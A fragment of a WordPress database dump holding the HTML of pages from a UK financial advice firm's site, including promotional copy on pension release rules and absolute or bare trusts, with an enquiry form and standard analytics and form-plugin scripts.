-->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n<div id=\"respond\" class=\"section\">&#13;\n	<div>&#13;\n	<div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n	<div>&#13;\n&#13;\n	<div><p class=\"cancel-comment-reply\"><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../7-pension-release-rules/\" style=\"display:none;\">Click here to cancel reply.</a></p></div>&#13;\n&#13;\n	&#13;\n	&#13;\n&#13;\n		&#13;\n		<div id=\"comment-input\">&#13;\n&#13;\n			&#13;\n&#13;\n			&#13;\n		&#13;\n			&#13;\n			&#13;\n		</div>&#13;\n		&#13;\n		<div id=\"comment-textarea\">&#13;\n			&#13;\n			&#13;\n		&#13;\n		</div>&#13;\n		&#13;\n		<div id=\"comment-submit\">&#13;\n		&#13;\n			<p/>&#13;\n&#13;\n						&#13;\n		</div>&#13;\n&#13;\n		&#13;\n	&#13;\n&#13;\n		</div>&#13;\n	</div>&#13;\n</div>&#13;\n&#13;\n					</div>&#13;\n			</div>&#13;\n	&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"../seven-deadly-investment-sins/\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../mortgage-strategic-alliance/\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../esmart-money-januaryfebruary-2014-issue/\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../how-much-money-can-i-get-pension/\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n						<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"social_links-widget-3\" class=\"footer-widget-col social_links\"><p>Connect With Us</p>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"../feed/\" target=\"\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Equity SMART target=\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																					</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main-min.js\"/></body>','7 Pension Release Rules to consider – so YOU don’t lose out.','To qualify, pension release rules state you must be 55 years old or over, unless your scheme allows early release due to severe medical reasons.','publish','closed','closed','','7-pension-release-rules-to-consider-so-you-dont-lose-out','','','2017-09-21 16:34:25','2017-09-21 16:34:25','',0,'http://www.equalitywalk.org.uk/7-pension-release-rules-to-consider-so-you-dont-lose-out',0,'page','',0),(44,1,'2017-09-21 16:34:25','2017-09-21 16:34:25','<body bgcolor=\"#ffffff\" onload=\"MM_preloadImages(\'images/investments_r4_c6_f2.jpg\',\'images/investments_r4_c9_f2.jpg\',\'images/investments_r4_c11_f2.jpg\',\'images/investments_r4_c12_f2.jpg\',\'images/investments_r4_c15_f2.jpg\',\'images/investments_r4_c16_f2.jpg\')\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n<div style=\"position:absolute; top:0px; left:50%; margin-left:-475px\">&#13;\n<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"950\"><tr><td><img src=\"/images/spacer.gif\" width=\"10\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"18\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"14\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"29\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"49\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"78\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"16\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"30\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"109\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"44\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"109\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"118\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"11\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"29\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"138\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"129\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"19\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"1\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"17\" valign=\"top\" class=\"header\" style=\"background-image:url(/images/index_r1_c1.jpg); background-repeat:no-repeat\"><a href=\"/wealth-management-faqs\">wealth management FAQs</a> -  <a href=\"/wealth-management-glossary\">glossary of wealth management terms</a> - <a href=\"/additional/financial-calendar\">financial calendar</a></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"1\" height=\"38\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"17\"> </td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"1\" height=\"27\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"9\"><a href=\"/\"><img name=\"investments_r3_c1\" src=\"/images/investments_r3_c1.jpg\" width=\"353\" height=\"96\" border=\"0\" id=\"investments_r3_c1\" alt=\"Wealth Management - Financial Advice and Information\" /></a></td>&#13;\n   <td colspan=\"8\" valign=\"top\"><div style=\"font-size:19px; text-align:right; margin-right:30px\">Offices throughout the UK,<br />&#13;\n     call us for expert financial advice - &#13;\n     <span style=\"color:#600\"><span class=\"adinsightNumber1901\"></span></span>&#13;\n<script type=\"text/javascript\" src=\"/jsapi.js\"></script><script type=\"text/javascript\"><![CDATA[\r\n  google.load(\'search\', \'1\');\r\n  google.setOnLoadCallback(function() {\r\n    google.search.CustomSearchControl.attachAutoCompletion(\r\n      \'011057125409238421392:utfk3c-gm7e\',\r\n      document.getElementById(\'q\'),\r\n      \'cse-search-box\');\r\n  });\r\n]]></script><form action=\"../../search-results/\" id=\"cse-search-box\">&#13;\n  <div>&#13;\n    <input type=\"hidden\" name=\"cx\" value=\"011057125409238421392:utfk3c-gm7e\" /><input type=\"hidden\" name=\"cof\" value=\"FORID:9\" /><input type=\"hidden\" name=\"ie\" value=\"UTF-8\" /><input type=\"text\" name=\"q\" id=\"q\" autocomplete=\"on\" size=\"21\" /><input type=\"submit\" name=\"sa\" value=\"Search our Site\" /></div>&#13;\n&#13;\n<script type=\"text/javascript\" src=\"/cse/brand_form_cse-search-box_amp_lang_en_amp_sitesearch_true.js\"></script></form></div></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"1\" height=\"96\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"5\"> </td>&#13;\n   <td colspan=\"3\"><a href=\"/pension\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c6\',\'\',\'images/investments_r4_c6_f2.jpg\',1)\"><img name=\"investments_r4_c6\" src=\"/images/investments_r4_c6.jpg\" width=\"124\" height=\"50\" border=\"0\" id=\"investments_r4_c6\" alt=\"Pension Advice\" /></a></td>&#13;\n   <td colspan=\"2\"><a href=\"/investments\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c9\',\'\',\'images/investments_r4_c9_f2.jpg\',1)\"><img name=\"investments_r4_c9\" src=\"/images/investments_r4_c9.jpg\" width=\"153\" height=\"50\" border=\"0\" id=\"investments_r4_c9\" alt=\"Savings &amp; Investments\" /></a></td>&#13;\n   <td><a href=\"/trusts-protection\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c11\',\'\',\'images/investments_r4_c11_f2.jpg\',1)\"><img name=\"investments_r4_c11\" src=\"/images/investments_r4_c11_f2.jpg\" width=\"109\" height=\"50\" border=\"0\" id=\"investments_r4_c11\" alt=\"Trusts and Bonds\" /></a></td> <td colspan=\"3\"><a href=\"/wealth-platform\" onmouseout=\"MM_swapImgRestore()\" onmouseover=\"MM_swapImage(\'index_r4_c11\',\'\',\'images/index_r4_c11_f2.jpg\',1)\"><img name=\"index_r4_c11\" src=\"/images/index_r4_c11.jpg\" width=\"158\" height=\"50\" border=\"0\" id=\"index_r4_c11\" alt=\"Wealth Management\" /></a></td>&#13;\n   <td><a href=\"/about-us\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c15\',\'\',\'images/investments_r4_c15_f2.jpg\',1)\"><img name=\"investments_r4_c15\" src=\"/images/investments_r4_c15.jpg\" width=\"138\" height=\"50\" border=\"0\" id=\"investments_r4_c15\" alt=\"About Us\" /></a></td>&#13;\n   <td colspan=\"2\"><a href=\"/contact-us\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c16\',\'\',\'images/investments_r4_c16_f2.jpg\',1)\"><img name=\"investments_r4_c16\" src=\"/images/investments_r4_c16.jpg\" width=\"148\" height=\"50\" border=\"0\" id=\"investments_r4_c16\" alt=\"Contact Us\" /></a></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"1\" height=\"50\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td rowspan=\"9\"><img name=\"investments_r5_c1\" src=\"/images/investments_r5_c1.jpg\" width=\"10\" height=\"545\" border=\"0\" id=\"investments_r5_c1\" alt=\"\" /></td>&#13;\n   <td colspan=\"15\"><div id=\"breadcrumb\"><a href=\"/\">home</a> &gt; <a href=\"/trusts-protection\">trusts and protection</a> &gt; absolute trust</div>&#13;\n     <h1>Absolute Trust / Bare Trust</h1>  </td>&#13;\n   <td rowspan=\"4\"><img name=\"investments_r5_c17\" src=\"/images/investments_r5_c17.jpg\" width=\"19\" height=\"260\" border=\"0\" id=\"investments_r5_c17\" alt=\"\" /></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"1\" height=\"63\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"6\"><img name=\"investments_r6_c2\" src=\"/images/investments_r6_c2.jpg\" width=\"204\" height=\"9\" border=\"0\" id=\"investments_r6_c2\" alt=\"\" /></td>&#13;\n   <td colspan=\"9\" rowspan=\"8\" valign=\"top\"><img src=\"/images/absolute-trust.jpg\" alt=\"Absolute Trusts\" name=\"investments_r6_c8\" width=\"450\" height=\"197\" border=\"0\" align=\"right\" id=\"investments_r6_c8\" /><div class=\"paracontent2\">&#13;\n       <p>We’ll Help You Formulate a More Tax  Efficient Plan When Bestowing a Financial Gift to Your Loved Ones - Quickly And  Easily, Through An Absolute Trust</p>&#13;\n     &#13;\n       <p>At this very moment, we know that you  may be thinking how do I  choose the  right type of Trust to safe guard my assets whenever gifting them to my  children, grand children or partner. </p>&#13;\n       <p>If you are certain about who you wish  to benefit from the Trust, forgo some flexibility and just aim for the  guarantee. This might be time to trust a tried and tested method? Absolute  Trusts, also known as a Bare Trust.</p>&#13;\n       <p>First you  need to consider that if we set up an Absolute Trust for you, your  beneficiaries cannot be changed.  </p>&#13;\n       <p>The money inside this trust cannot ever be  claimed back by you and can be demanded by the beneficiaries at age 18 or 16 in Scotland.</p>&#13;\n<div align=\"center\" style=\"padding-top:1px\"><img src=\"/images/go-button.gif\" width=\"550\" height=\"66\" alt=\"Pension Advice\" /></div>&#13;\n     </div></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"1\" height=\"9\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"2\" rowspan=\"7\" valign=\"top\"><img name=\"investments_r7_c2\" src=\"/images/investments_r7_c2.jpg\" width=\"32\" height=\"480\" border=\"0\" id=\"investments_r7_c2\" alt=\"\" /></td>&#13;\n   <td colspan=\"3\" valign=\"top\" class=\"related\" style=\"background-image:url(/images/investments_r7_c4.jpg); background-repeat:no-repeat\">Related Pages</td>&#13;\n   <td rowspan=\"6\" valign=\"top\"><img src=\"/images/investments_r7_c7.jpg\" alt=\"\" name=\"investments_r7_c7\" width=\"16\" height=\"480\" border=\"0\" align=\"top\" id=\"investments_r7_c7\" /></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"1\" height=\"34\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"3\" rowspan=\"5\" valign=\"top\" class=\"relatedlinks\" style=\"background-image:url(/images/investments_r13_c4.jpg); background-position:bottom; background-repeat:no-repeat\"><a href=\"/asset-protection\">Asset Protection Trust</a> <br />&#13;\n     helping you protect, what you could easily lose <br /><br /><a href=\"/discretionary-trusts\">Discretionary Trusts</a><br />&#13;\n     the trustees have \'discretion\' about how to use the income received by the trust<br /><br /><a href=\"/absolute-trust\">Absolute Trust</a><br />&#13;\n     a trust for when you are certain about who you wish to benefit<br /><br /><a href=\"/gift-loan-schemes\">Gift &amp; Loan Schemes</a><br />&#13;\n     find out how to reduce your Inheritance Tax liability<br /><br /><a href=\"/wills-trust\">Wills &amp; Trust</a><br />&#13;\n     remain an important estate planning mechanism for us all </td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"1\" height=\"154\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td rowspan=\"5\" valign=\"top\"> </td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"1\" height=\"71\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td><img src=\"/images/spacer.gif\" width=\"1\" height=\"108\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td><img src=\"/images/spacer.gif\" width=\"1\" height=\"24\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td><img src=\"/images/spacer.gif\" width=\"1\" height=\"58\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"3\" valign=\"top\"> </td>&#13;\n   <td> </td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"1\" height=\"24\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"17\"><img name=\"investments_r14_c1\" src=\"/images/investments_r14_c1.jpg\" width=\"950\" height=\"8\" border=\"0\" id=\"investments_r14_c1\" alt=\"\" /></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"1\" height=\"8\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td rowspan=\"2\"><img name=\"investments_r15_c1\" src=\"/images/investments_r15_c1.jpg\" width=\"10\" height=\"245\" border=\"0\" id=\"investments_r15_c1\" alt=\"\" /></td>&#13;\n   <td rowspan=\"2\"><img name=\"investments_r15_c2\" src=\"/images/investments_r15_c2.jpg\" width=\"18\" height=\"245\" border=\"0\" id=\"investments_r15_c2\" alt=\"\" /></td>&#13;\n   <td colspan=\"10\"><div class=\"moreinfo\">more information on Absolute Trust...</div></td>&#13;\n   <td rowspan=\"2\"><img name=\"investments_r15_c13\" src=\"/images/investments_r15_c13.jpg\" width=\"11\" height=\"245\" border=\"0\" id=\"investments_r15_c13\" alt=\"\" /></td>&#13;\n   <td colspan=\"3\"><div class=\"moreinfo\">Contact Us for Advice</div></td>&#13;\n   <td rowspan=\"2\"><img name=\"investments_r15_c17\" src=\"/images/investments_r15_c17.jpg\" width=\"19\" height=\"245\" border=\"0\" id=\"investments_r15_c17\" alt=\"\" /></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"1\" height=\"54\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"10\" valign=\"top\"><div class=\"paracontent2\">&#13;\n     <p>Complete our short form  to find out more...</p>&#13;\n</div></td>&#13;\n   <td colspan=\"3\" valign=\"top\"><div class=\"form\" id=\"form\" style=\"width:310; height:125px; text-align: right; font-size:12px; color:#600000; font-weight:bold; margin-left:6px\"> &#13;\n  <form action=\"../../thank-you/\" method=\"post\" name=\"form\" id=\"form\" onsubmit=\"MM_validateForm(\'name\',\'\',\'R\',\'surname\',\'\',\'R\',\'telephone\',\'\',\'NisNum\');return document.MM_returnValue\"><table width=\"280\" border=\"0\" align=\"right\" cellpadding=\"1\" cellspacing=\"4\"><tr><td width=\"117\" style=\"text-align: left\">First name:&#13;\n        <input name=\"name\" type=\"text\" id=\"name\" size=\"15\" style=\"border-color:#999; border-width:thin; border-style:solid;\" /></td>&#13;\n      <td width=\"168\" style=\"text-align: left\">Surname:&#13;\n        <br /><input name=\"surname\" type=\"text\" id=\"surname\" size=\"17\" style=\"border-color:#999; border-width:thin; border-style:solid;\" /></td>&#13;\n    </tr><tr><td style=\"text-align: left\"> Email:<br /><input name=\"email\" type=\"text\" id=\"email\" size=\"15\" style=\"border-color:#999; border-width:thin; border-style:solid;\" /></td>&#13;\n      <td style=\"text-align: left\">Daytime Tel:&#13;\n        <input name=\"telephone\" type=\"text\" id=\"telephone\" size=\"17\" style=\"border-color:#999; border-width:thin; border-style:solid;\" /></td>&#13;\n    </tr><tr><td style=\"text-align: left\">Evening Tel:&#13;\n        <input name=\"telephone2\" type=\"text\" id=\"telephone2\" size=\"15\" style=\"border-color:#999; border-width:thin; border-style:solid;\" /></td>&#13;\n      <td style=\"text-align: left\">Postcode:<br /><input name=\"postcode\" type=\"text\" id=\"postcode\" size=\"17\" style=\"border-color:#999; border-width:thin; border-style:solid;\" /></td>&#13;\n    </tr><tr><td style=\"text-align: left\">Date of Birth:&#13;\n        <input name=\"dob\" type=\"text\" id=\"dob\" style=\"border-color:#999; border-width:thin; border-style:solid;\" value=\"dd/mm/yy\" size=\"15\" /></td>&#13;\n      <td style=\"text-align: left\">Intestested In?<br /><select name=\"interested\" id=\"interested\"><option value=\"--\">--</option><option value=\"asset\">Asset Trust</option><option value=\"discretionery\">Discretionery</option><option value=\"absolute\" selected=\"selected\">Absolute Trust</option><option value=\"business\">Business Protection</option><option value=\"gift\">Gift Loan Scheme</option><option value=\"wills\">Wills and Trust</option></select></td>&#13;\n    </tr><tr><td style=\"text-align: left\"></td>&#13;\n      <td style=\"text-align: left\"><label>&#13;\n        <input name=\"submit\" type=\"image\" id=\"submit\" value=\"Submit\" src=\"/images/submit.jpg\" alt=\"Savings &amp; Investments\" align=\"right\" /></label> </td>&#13;\n    </tr><tr><td style=\"text-align: left\"></td>&#13;\n      <td style=\"text-align: left\"> </td>&#13;\n    </tr><tr><td colspan=\"2\" style=\"text-align: left\"><div style=\"border-style:dotted; border-width:thin; border-color:#999; padding:5px; font-weight:normal\">Note: The Financial Services Authority does not regulate some forms of tax advice, trusts &amp; wills</div></td>&#13;\n      </tr></table><br /></form></div></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"1\" height=\"191\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"17\"><img name=\"investments_r17_c1\" src=\"/images/investments_r17_c1.jpg\" width=\"950\" height=\"6\" border=\"0\" id=\"investments_r17_c1\" alt=\"\" /></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"1\" height=\"6\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"17\" valign=\"top\" style=\"background-image:url(/images/index_r16_c1.jpg); background-repeat:no-repeat; color:#333;\"><div class=\"footerlinks\"><a href=\"/\"></a></div><div class=\"footertext\"><br /></div></td>&#13;\n   <td><img src=\"/images/spacer.gif\" width=\"1\" height=\"75\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr></table></div>&#13;\n<script type=\"text/javascript\"><![CDATA[\r\nvar gaJsHost = ((\"https:\" == document.location.protocol) ? \"https://ssl.\" : \"http://www.\");\r\ndocument.write(unescape(\"%3Cscript src=\'\" + gaJsHost + \"google-analytics.com/ga.js\' type=\'text/javascript\'%3E%3C/script%3E\"));\r\n]]></script><script type=\"text/javascript\"><![CDATA[\r\ntry {\r\nvar pageTracker = _gat._getTracker(\"UA-10958181-3\");\r\npageTracker._trackPageview();\r\n} catch(err) {}]]></script><script type=\"text/javascript\"><![CDATA[\r\n   var adiInit =\"488\";\r\n   (function() {\r\n      var adiSrc = document.createElement(\"script\"); adiSrc.type = \"text/javascript\";\r\n      adiSrc.async = true;\r\n      adiSrc.src = (\"https:\" == document.location.protocol ? \"https://\" : \"http://\") + \"static.adinsight.eu/static/scripts/adiTrack.min.js\";\r\n      var s = document.getElementsByTagName(\"script\")[0];\r\n      s.parentNode.insertBefore(adiSrc, s);\r\n   })();\r\n]]></script></body>','Absolute Trust / Bare Trust- Experts in Trusts and Protection','As the beneficiaries within an Absolute Trust cannot be amended, you must be certain before finalising this.  Call us for further advice on 01272 225114.','publish','closed','closed','','absolute-trust-bare-trust-experts-in-trusts-and-protection','','','2017-09-21 16:34:25','2017-09-21 16:34:25','',0,'http://www.equalitywalk.org.uk/absolute-trust-bare-trust-experts-in-trusts-and-protection',0,'page','',0),(45,1,'2017-09-21 16:34:25','2017-09-21 16:34:25','<body class=\"page page-id-109 page-child parent-pageid-30 page-template page-template-side-navigation-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		&#13;\n		<header id=\"header\"/></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									</div>&#13;\n					<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Absolute Trusts										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"/trusts\" title=\"Trusts\">Trusts</a></li><li>Absolute Trusts</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n													<div id=\"main\" class=\"\" style=\"overflow:hidden !important;\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n					<div id=\"content\" style=\"float:right;\">&#13;\n				<div id=\"post-109\" class=\"post-109 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Absolute Trusts</span>&#13;\n			<span class=\"updated\" style=\"display: none;\">June 19th, 2017</span>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"/author/rs-r-admin\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<p><a href=\"#\"/></p>&#13;\n<h4>We’ll help you formulate a more tax efficient plan when bestowing a financial gift to your loved ones, quickly and easily - through Absolute Trusts</h4>&#13;\n<p>At this very moment, we know that you may be thinking how do I  choose the right type of Trust to safe guard my assets whenever gifting them to my children, grand children or partner.</p>&#13;\n<p>If you are certain about who you wish to benefit from the Trust, forgo some flexibility and just aim for the guarantee. This might be time to trust a tried and tested method? Absolute Trusts, also known as a Bare Trust.</p>&#13;\n<p>First you need to consider that if we set up an Absolute Trust for you, your beneficiaries cannot be changed.</p>&#13;\n<p>The money inside this absolute trust cannot ever be claimed back by you and can 